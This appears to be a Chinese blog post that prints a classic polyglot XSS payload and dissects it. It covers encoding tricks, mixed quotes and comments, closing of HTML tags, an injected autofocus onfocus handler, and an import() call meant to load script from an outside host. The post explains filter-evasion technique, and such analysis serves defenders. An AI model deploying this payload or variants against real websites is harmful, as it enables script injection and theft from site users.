【XSS payload 】一个经典的XSS payload

zhengfei6112026-02-25 20:06

整体结构

原始Payload:

复制代码 
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

解码关键部分:

  • %250A → 换行符 \n

  • %26apos;'(HTML实体单引号)

  • \74 → 八进制 <

  • \76 → 八进制 >

解码后大致为:

复制代码 
JavaScript://\n/*?'/*\'/*"/*\"/*`/*\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript><k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//>
-->
复制代码

注意末尾的 //>--> 是分离的。

各组成部分的作用

1. JavaScript伪协议 + 换行绕过注释

  • JavaScript:// 试图构造一个 javascript: URL(大小写不敏感),但多了一个斜杠,实际浏览器可能仍解析为伪协议。

  • %250A 解码为换行符,用于结束单行注释 //,使得后续代码变为可执行。

  • javascript: URL 中,浏览器先对URL解码,然后执行得到的JavaScript代码。解码后为 JavaScript://\n...,其中 // 注释掉空内容,换行后代码开始执行。

2. 多种引号和注释混淆
  • /*?'/*\'/*"/*\"/*/*`/*')/*<!--这部分包含各种引号(单、双、反引号)及转义版本,以及HTML实体,旨在绕过WAF对特定字符的过滤。同时夹杂/*<!--` 注释,可能试图干扰解析器。
3. 闭合常见HTML标签
  • </Title></Style></Script></textArea></iFrame></noScript> 试图关闭可能存在的父标签,使后续内容作为新的HTML插入,从而注入新元素。
4. 注入新标签及事件处理器

  • \74k<K 解码为 <k<K,可能是 <k<K 标签(不标准,但浏览器会尝试解析为标签名)。随后紧跟 /contentEditable/autoFocus/OnFocus=,这试图为标签设置属性:

    • contentEditable 使元素可编辑

    • autoFocus 使页面加载时自动获得焦点

    • OnFocus 定义焦点事件的处理函数

  • 属性值是一段JavaScript代码,其中包含多层注释和 import() 调用。

5. 事件处理函数中的JavaScript

OnFocus 的值:

复制代码 
/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

  • 经过注释解析后,实际执行的代码为:{ /**/ (import(/https: X55.is/.source)) }(前面的 /*...*/ 注释掉了 /*${/*/;,后面的 //> 注释掉剩余部分)。

  • import(/https: X55.is/.source)

    • /https: X55.is/ 是一个正则表达式字面量,.source 返回其字符串内容 "https: X55.is"

    • 因此 import() 试图动态加载模块 "https: X55.is",但该URL包含空格,实际无效。可能本意是加载 https://X55.is/,但写法有误。

  • 如果加载成功,该外部脚本可能包含 alert() 或其他恶意代码。

6. HTML注释闭合
  • 最后的 \76--> 解码为 >-->,可能试图闭合前面可能存在的 <!-- 注释,确保HTML结构完整。

攻击原理总结

该Payload尝试在多种上下文中执行:

  • 作为 javascript: URL :若放在 hrefsrc 中,点击或加载时会执行解码后的代码,触发动态导入。

  • 作为HTML注入 :若插入到页面中,它会闭合已有标签,创建新元素(如 <k>)并设置 onfocus 事件,当元素获得焦点(如通过 autofocus)时执行事件中的 import()

  • 动态导入:尝试加载外部脚本,若成功则可能弹出弹窗。

由于语法错误(import 参数格式不对),该Payload可能无法直接执行,但反映了攻击者常用的混淆技术,包括:

  • URL编码绕过

  • 注释嵌套和换行

  • 多种引号组合

  • 标签闭合和事件注入

  • ES6动态导入

注意 :实际测试时,import() 需要正确的模块URL,且受CORS限制,因此该Payload可能仅用于演示或绕过WAF的测试。

相关推荐
牛奶3 小时前
AI辅助开发最佳实践:2026年新方法
前端·aigc·ai编程
C澒4 小时前
微前端容器标准化:公共能力标准化
前端·架构
Setsuna_F_Seiei4 小时前
AI 对话应用之 JS 的流式接口数据处理
前端·javascript·ai编程
青柠代码录4 小时前
【Vue3】Vue Router 4 路由全解
前端·vue.js
无限大64 小时前
《AI观,观AI》:专栏总结+答疑|吃透核心,解决你用AI的所有困惑
前端·后端
蜡台5 小时前
element-ui 2 el-tree 内容超长滚动条不显示问题
前端·vue.js·elementui·el-tree·v-deep
小小小小宇7 小时前
软键盘常见问题(二)
前端
小小小小宇7 小时前
软键盘常见问题
前端
小小小小宇7 小时前
富文本编辑器知识体系(三)
前端
小小小小宇7 小时前
富文本编辑器知识体系(二)
前端
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04UV安装并设置国内源05OpenClaw Control UI安全上下文访问配置06本地部署 OpenClaw + DeepSeek-R1 完全指南07OpenClaw macOS 完整安装与本地模型配置教程(实战版)08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南